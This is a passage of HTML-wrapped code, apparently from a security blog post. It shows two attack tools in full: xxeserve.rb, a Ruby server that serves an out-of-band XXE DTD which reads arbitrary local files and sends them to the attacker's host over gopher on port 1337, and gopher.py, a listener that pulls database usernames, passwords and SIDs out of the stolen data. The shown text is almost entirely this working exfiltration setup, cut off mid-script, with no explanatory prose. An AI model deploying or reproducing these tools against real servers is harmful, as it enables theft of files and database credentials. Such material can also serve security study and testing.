params[:p].nil?    f = File.open(&#8220;.\/files\/#{request.ip}#{Time.now.to_i}&#8221;,&#8221;w&#8221;)    f.write(params[:p])    f.close    &#8220;&#8221;  end    get &#8220;\/xml&#8221; do    return &#8220;&#8221; if params[:f].nil?    &lt;&lt;END    &lt;!ENTITY % payl SYSTEM &#8220;file:\/\/\/#{params[:f]}&#8221;&gt;  &lt;!ENTITY % int &#8220;&lt;!ENTITY &amp;#37; trick SYSTEM &#8216;gopher:\/\/#{request.host}:1337\/?%payl;&#8217;&gt;&#8221;&gt;  END  end<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fbf386262268-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fbf386262268-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env ruby<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-2\"><span class=\"crayon-p\"># Notes:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-3\"><span class=\"crayon-p\"># &#8211; This is the out of band xxe server that is used to retrieve the file and send it via the gopher protocol<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-4\"><span class=\"crayon-p\"># &#8211; ruby xxeserve.rb -o 0.0.0.0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-6\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;sinatra&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-8\"><span class=\"crayon-i\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;OHAI&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;.\/files\/#{request.ip}#{Time.now.to_i}&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-14\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-16\"><span class=\"crayon-i\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/xml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nil<\/span><span class=\"crayon-sy\">?<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-19\"><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-st\">END<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-20\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">payl <\/span><span class=\"crayon-i\">SYSTEM<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;file:\/\/\/#{params[:f]}&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-21\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">ENTITY<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&lt;!ENTITY &amp;#37; trick SYSTEM &#8216;gopher:\/\/#{request.host}:1337\/?%payl;&#8217;&gt;&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fbf386262268-22\"><span class=\"crayon-st\">END<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fbf386262268-23\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>gopher.py<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58cf040336fc1447319366\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  # Notes:  # &#8211; This code just listens for client requests on port 1337  # &#8211; it looks for database strings and prints them out    import socket  import sys  import re    # Create a TCP\/IP socket  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Bind the socket to the port  server_address = (&#8216;0.0.0.0&#8217;, 1337)  print &gt;&gt;sys.stderr, &#8216;starting up on %s port %s&#8217; % server_address      sock.bind(server_address)  \t  # Listen for incoming connections  sock.listen(1)    while True:      # Wait for a connection      print &gt;&gt;sys.stderr, &#8216;waiting for a connection&#8217;      connection, client_address = sock.accept()      try:          print &gt;&gt;sys.stderr, &#8216;connection from&#8217;, client_address            # Receive the data in small chunks and retransmit it          while True:              data = connection.recv(2048)                            if data:  \t\t\t\t#print data  \t\t\t\tmatchuser = re.search(&#8220;&lt;user&gt;(.*)&lt;\/user&gt;&#8221;, data)  \t\t\t\tmatchpassword = re.search(&#8220;&lt;password&gt;(.*)&lt;\/password&gt;&#8221;, data)  \t\t\t\tmatchurl = re.search(&#8220;&lt;url&gt;(.*)&lt;\/url&gt;&#8221;, data)  \t\t\t\tif matchuser and matchpassword and matchurl:  \t\t\t\t\tprint &#8220;(+) The database SID is: %s&#8221; % matchurl.group(1)  \t\t\t\t\tprint &#8220;(+) The database username is: %s&#8221; % matchuser.group(1)  \t\t\t\t\tprint &#8220;(+) The database password is: %s&#8221; % matchpassword.group(1)  \t\t\t\t\tconnection.close()  \t\t\t\t\tsys.exit(1)  \t\t\t\tconnection.close()  \t\t\t\tsys.exit(1)              else:                  print &gt;&gt;sys.stderr, &#8216;no more data from&#8217;, client_address                  break                    except Exception:  \t    connection.close()  \t\t      finally:          # Clean up the connection          connection.close()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-56\">56<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-2\"><span class=\"crayon-p\"># Notes:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-3\"><span class=\"crayon-p\"># &#8211; This code just listens for client requests on port 1337<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-4\"><span class=\"crayon-p\"># &#8211; it looks for database strings and prints them out<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">re<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-10\"><span class=\"crayon-p\"># Create a TCP\/IP socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-11\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AF_INET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOCK_STREAM<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-13\"><span class=\"crayon-p\"># Bind the socket to the port<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-14\"><span class=\"crayon-v\">server_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;0.0.0.0&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-15\"><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;starting up on %s port %s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">server_address<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-18\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">server_address<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-19\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-20\"><span class=\"crayon-p\"># Listen for incoming connections<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-21\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">listen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-23\"><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Wait for a connection<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;waiting for a connection&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">client_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">accept<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;connection from&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">client_address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Receive the data in small chunks and retransmit it<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-35\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-p\">#print data<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-36\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchuser<\/span><span class=\"crayon-h\"> <\/span><span 